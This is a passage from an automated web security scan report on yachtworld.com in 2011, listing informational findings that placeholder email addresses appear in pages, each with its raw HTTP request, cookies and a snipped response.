savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:04 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.25. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Massachusetts/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Massachusetts/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:04 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:11 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.26. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Michigan/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Michigan/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:05 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.27. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/New+Jersey/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/New+Jersey/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:06 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.28. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/New+York/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/New+York/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:06:51 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.29. http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/North+Carolina/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/North+Carolina/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 